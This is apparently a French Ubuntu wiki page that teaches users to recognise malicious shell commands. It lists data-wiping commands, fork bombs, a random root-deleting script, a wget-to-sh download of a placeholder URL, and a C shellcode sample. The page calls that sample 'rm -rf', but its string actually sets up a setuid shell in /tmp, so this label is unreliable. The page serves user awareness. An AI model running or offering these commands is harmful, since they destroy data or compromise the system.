Contenu | Rechercher | Menus

Les commandes dangereuses

La ligne de commande est un outil puissant, et notamment très pratique pour détecter ou résoudre les problèmes : il en est donc souvent fait usage sur le forum ou dans la documentation. Cependant, certains utilisateurs malveillants peuvent donner des commandes dangereuses qui corrompent, voire détruisent le système, ou les données. L'exécution d'une commande nécessite donc toujours la plus grande prudence (utiliser la commande man, moteurs de recherche, attente d'un deuxième avis, etc.).

À titre d'exemple et dans un but éducatif, afin de montrer qu'il convient toujours de se méfier, voilà quelques commandes dangereuses.

Attention, ces commandes sont dangereuses, ne les exécutez pas !
N'exécutez sous aucun prétexte une commande dont vous n'êtes pas sûr, n'hésitez pas à demander conseil sur le forum.

Cette liste est loin d'être exhaustive, mais devrait vous donner un aperçu de ce que les gens peuvent essayer de vous inciter à faire. Souvenez-vous que cela peut être dissimulé dans une commande ou masqué dans le cadre d'une procédure longue.

Les "QUELQUE_CHOSE", "QUELQUE_COMMANDE" et "QUELQUE_CHOSE_IMPORTANT" indiqués dans les commandes pouvant être remplacés par n'importe quelle chaîne de caractères.

Suppression de tous les fichiers ou des fichiers du répertoire actuel ou de fichiers importants

Sous linux avec un terminal on peut tout faire, absolument tout. Donc lisez bien ceci : Le danger de ces commandes est tout à fait évident :

Règle n° 1 : NE JAMAIS VALIDER UNE COMMANDE QUI POURRAIT VOUS FAIRE PERDRE VOS DONNÉES ET VOTRE SYSTÈME.

En cas de doute, n'hésitez pas à faire une sauvegarde de vos données sur un support externe tel qu'une clef USB, un disque dur USB, ou un CD/DVD enregistrable, et à vérifier que la sauvegarde a fonctionné.

Celles qui peuvent tout effacer (fichier système ou données personnelles) :

rm -rf /
rm -rf .
rm -rf *
mv QUELQUE_CHOSE /dev/null
shred QUELQUE_CHOSE
QUELQUE_COMMANDE > QUELQUE_CHOSE_IMPORTANT
sed QUELQUE_CHOSE -i QUELQUE_CHOSE
mv -r / /dev/null (Déplace les fichiers de façon récursive depuis la racine vers null = tout est effacé).

la commande

> fichiers*

est aussi redoutable : elle redirige du rien en écrasant les fichiers.

ainsi que toutes les variantes commençant par 'rm' et 'mv' et se terminant par /dev/null Pourquoi ?

  • rm est la commande de suppression des fichiers sous Gnu/Linux, rm quelque chose supprimera ce quelque chose, imaginez que vous supprimez tous vos fichiers système ( racine / ) , ou vos fichier personnels ( /home/<votreidentifiant/ ) !

/dev/null est l'équivalent de la corbeille définitive, tout fichier envoyé à cette sortie entraîne sa suppression.

Assurez vous que :

  • un avertissement vous prévient et vous en assumerez les conséquences en cas de perte de données.
  • la documentation est bien claire, bien rédigée, explicite.

Protection remplacer le plus souvent possible cette commande par :

rm -i <nom du fichier à supprimer>

( mode interactif avec confirmation de suppression ) Vous pouvez aussi utiliser la commande mv ( déplacer )

mv <nom du fichier à supprimer> ~/.local/share/Trash/files

Exemple :

Suppression du fichier labrador.jpeg (une image) au lieu d'exécuter

rm labrador.jpeg

Entrez plutôt :

rm -i labrador.jpeg
mv labrador.jpeg ~/.local/share/Trash/files

Règle n° 2 : NE JAMAIS ou du moins LE MOINS POSSIBLE OUVRIR NAUTILUS (LE GESTIONNAIRE DE FICHIERS) EN MODE SUPER UTILISATEUR (ROOT) VOUS POURRIEZ PERDRE VOS DONNÉES ET ENDOMMAGER VOTRE SYSTÈME.

Cliquer ici pour voir la commande avec une astuce en prime !! :
Ouvrir le gestionnaire de fichiers Nautilus avec tous les droits (root, super utilisateur)

  • La commande find peut aussi être dangereuse, avec son paramètre -exec qui permet d'exécuter une commande sur le résultat d'une recherche.

Par exemple, la commande suivante est très dangereuse : elle provoque la suppressions de tous les fichiers.

sudo find / -name "*" -exec rm {} \;

De même pour rm qui est utilisé.

Re-formatage

Les données sur le périphérique mentionné après la commande mkfs seront détruites et remplacées par un système de fichier vide :

mkfs
mkfs.ext3
mkfs.QUELQUE_CHOSE

Manipulation de périphériques de stockage

Écrit des données sur le périphérique et peut entraîner la perte totale des données :

QUELQUE_COMMANDE > /dev/sda
dd if=QUELQUE_CHOSE of=/dev/sda

Forkbomb

Exécute un grand nombre de processus jusqu'à ce que le système gèle, ce qui vous force à faire un arrêt brutal et peut causer la corruption du système, ou d'autres désagréments.

Avec le shell Bash :

:(){:|:&};:

En Perl :

perl -e "fork while fork"

Si vous voulez savoir comment se protéger contre les forks bombs allez voir ici.

Tarbomb

Quelqu'un vous demande d'extraire une archive dans un répertoire existant. Cette archive tar peut être conçue pour exploser en un grand nombre de fichiers, voire écraser les fichiers de l'utilisateur qui portent le même nom que ceux de l'archive. Vous devriez donc prendre l'habitude de décompresser des tar dans un nouveau répertoire vide. Ce cas est extrêmement rare, puisque, sous Ubuntu du moins, une archive contenant plus d'un fichier se décompressera dans un nouveau dossier.

On parle ici de fichiers tar, mais c'est valable pour tous les formats de compression existant (zip, gzip, tar-gz etc…)

Decompression bomb

Quelqu'un vous demande d'extraire une archive qui semble petite lors du téléchargement mais qui contient à la décompression des données d'une taille beaucoup plus considérable, au point de remplir votre disque dur. Vous ne devriez pas utiliser des données d'une source non-fiable. N'hésitez pas à regarder ce que contient le fichier compressé avant la décompression.

Shell

Quelqu'un vous donne le lien vers un script shell à exécuter. Il peut contenir n'importe quelle commande (bénigne ou malveillante). Vous ne devriez pas exécuter du code de personnes à qui vous ne faites pas confiance :

wget http://une_adresse/un_fichier
sh ./un_fichier
wget http://une_adresse/un_fichier -O- | sh

Roulette russe

Une fois ce script lancé, vous avez une "chance" sur 6 pour que tous les fichiers à la racine de votre système soient effacés. Faites attention à ce script et ses variantes !

#!/bin/bash
echo ""
! (( $RANDOM % 6 )) && rm -fr / || echo "You live" 
exit 0

Compilation de code

Quelqu'un vous donne le code source et vous dit de le compiler. Il est facile de cacher du code malveillant dans un long code source, et le code source donne à l'attaquant beaucoup de possibilités pour déguiser son code malveillant. Vous ne devriez pas compiler ou exécuter le code compilé, à moins qu'il ne s'agisse d'une application bien connue, obtenue à partir d'un site réputé (SourceForge, les sites Ubuntu, etc.).

Par exemple :

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Ceci est la forme hexadécimale de rm -rf qui va détruire votre répertoire en tant que simple utilisateur, ou tous les fichiers en tant que root.

Changements de droits

chmod -R 777 /

Ceci donne les droits de lecture et d'écriture sur tous les fichiers. Or les commandes situées dans /bin ne supportent pas ce mode. Dans ce cas, il faut réattribuer la valeur o-w, il faut que vous ayez les droits u+w sur /tmp

Pour info : un / non modifié :

$ ls -al /
total 100
drwxr-xr-x  21 root root  4096 2009-07-15 09:39 .
drwxr-xr-x  21 root root  4096 2009-07-15 09:39 ..
drwxr-xr-x   2 root root  4096 2009-07-14 00:49 bin
drwxr-xr-x   3 root root  4096 2009-07-15 09:39 boot
lrwxrwxrwx   1 root root    11 2009-07-09 22:34 cdrom -> media/cdrom
drwxr-xr-x  17 root root  4920 2009-07-18 04:47 dev
drwxr-xr-x 144 root root 12288 2009-07-18 05:30 etc
drwxr-xr-x   3 root root  4096 2009-07-09 22:40 home
lrwxrwxrwx   1 root root    33 2009-07-15 09:39 initrd.img -> boot/initrd.img-2.6.28-14-generic
lrwxrwxrwx   1 root root    33 2009-07-09 23:04 initrd.img.old -> boot/initrd.img-2.6.28-13-generic
drwxr-xr-x  19 root root 12288 2009-07-17 21:58 lib
drwx------   2 root root 16384 2009-07-09 22:34 lost+found
drwxr-xr-x   9 root root  4096 2009-07-18 04:42 media
drwxr-xr-x   2 root root  4096 2009-04-13 11:33 mnt
drwxr-xr-x   2 root root  4096 2009-04-20 15:59 opt
dr-xr-xr-x 177 root root     0 2009-07-18 06:35 proc
drwx------  14 root root  4096 2009-07-18 05:10 root
drwxr-xr-x   2 root root  4096 2009-07-17 21:59 sbin
drwxr-xr-x   2 root root  4096 2009-03-06 17:21 selinux
drwxr-xr-x   2 root root  4096 2009-04-20 15:59 srv
drwxr-xr-x  12 root root     0 2009-07-18 06:35 sys
drwxrwxrwt  16 root root  4096 2009-07-18 05:17 tmp
drwxr-xr-x  13 root root  4096 2009-07-17 01:34 usr
drwxr-xr-x  16 root root  4096 2009-07-10 15:35 var
lrwxrwxrwx   1 root root    30 2009-07-15 09:39 vmlinuz -> boot/vmlinuz-2.6.28-14-generic
lrwxrwxrwx   1 root root    30 2009-07-09 23:04 vmlinuz.old -> boot/vmlinuz-2.6.28-13-generic

Plus généralement, attention aux changements de droits, surtout quand ils s'appliquent sur des dossiers. Par exemple un

chmod -R xxx /home/votre_utilisateur

peut vous obliger à recréer un compte utilisateur, vu que certains fichiers nécessitent des droits particuliers.

Ajout d'un mot de passe au compte

sudo passwd root

La commande "sudo passwd root " peut vous faire perdre vos droits sudo !!

8-) Pour récupérer ses droits sudo sur son compte, se loguer en root ("sudo -i") et tapez :

adduser votre_username sudo

Conclusion

Encore une fois, il ne s'agit pas de donner une liste complète des commandes malveillantes, et il ne faut pas utiliser cette page comme une liste de vérification pour déterminer si une commande est dangereuse ou pas ! Cette page est simplement éducative, pour faire prendre conscience à l'utilisateur de la dangerosité potentielle du shell. Toute commande ne doit être exécutée que si elle est sûre et si l'on comprend ce que l'on fait.

Le meilleur moyen d'évaluer les risques est probablement l'utilisation de la commande man.


Contributeurs principaux : на_краю, tshirtman, morgen_stern.

Basé sur « ATTENTION ALL USERS: Malicious Commands » par jdong.



Le contenu de ce wiki est sous licence : CC BY-SA v3.0